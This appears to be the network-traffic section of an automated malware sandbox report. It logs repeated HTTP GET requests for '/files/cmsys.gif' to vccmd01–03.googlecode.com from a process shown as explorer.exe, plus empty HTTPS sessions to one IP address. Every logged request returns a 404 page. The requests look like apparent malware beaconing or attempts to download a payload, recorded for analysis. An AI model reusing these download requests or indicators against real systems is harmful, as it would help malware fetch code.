                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:10.279551029 CEST  1391  IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  17  192.168.2.4  49785  142.250.145.82  80  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data
                                                                                  Aug 5, 2022 09:10:12.731399059 CEST  1392  OUT  GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:12.758972883 CEST  1393  IN  HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:12 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:12.758996010 CEST  1393  IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  18  192.168.2.4  49791  142.250.145.82  80  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data
                                                                                  Aug 5, 2022 09:10:23.981744051 CEST  1453  OUT  GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:24.008917093 CEST  1455  IN  HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:23 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:24.008934021 CEST  1455  IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  19  192.168.2.4  49793  142.250.145.82  80  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data
                                                                                  Aug 5, 2022 09:10:26.143997908 CEST  1466  OUT  GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:26.171617985 CEST  1467  IN  HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:26 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:26.171638012 CEST  1468  IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  2  192.168.2.4  49782  51.81.194.202  443  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  20  192.168.2.4  49794  142.250.145.82  80  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data
                                                                                  Aug 5, 2022 09:10:28.479887962 CEST  1469  OUT  GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:28.507208109 CEST | 1470 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:28 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:28.507251024 CEST | 1471 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  21 | 192.168.2.4 | 49802 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:10:40.322120905 CEST | 9192 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:40.348905087 CEST | 9193 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:40 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:40.348932981 CEST | 9193 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  22 | 192.168.2.4 | 49803 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:10:42.379738092 CEST | 9194 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:42.406915903 CEST | 9196 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:42 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:42.406941891 CEST | 9196 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  23 | 192.168.2.4 | 49804 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:10:44.438968897 CEST | 9197 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:44.466250896 CEST | 9199 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:44 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:44.466272116 CEST | 9199 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  24 | 192.168.2.4 | 49806 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:10:53.283324957 CEST | 9204 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:53.313359022 CEST | 9205 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:53 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Aug 5, 2022 09:10:53.313378096 CEST | 9206 | IN |
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.4 | 49807 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:10:57.380153894 CEST | 9206 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:10:57.407433033 CEST | 9208 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:57 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Aug 5, 2022 09:10:57.407455921 CEST | 9208 | IN |
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.4 | 49809 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:10:59.736529112 CEST | 9217 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:10:59.763562918 CEST | 9218 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:59 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Aug 5, 2022 09:10:59.763583899 CEST | 9218 | IN |
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.4 | 49811 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:11:08.292252064 CEST | 9225 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:11:08.321787119 CEST | 9227 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:11:08 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Aug 5, 2022 09:11:08.321803093 CEST | 9227 | IN |
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.4 | 49812 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:11:10.739631891 CEST | 9228 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:11:10.766580105 CEST | 9229 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:11:10 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:11:10.766590118 CEST | 9230 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  3 | 192.168.2.4 | 49789 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  4 | 192.168.2.4 | 49798 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data


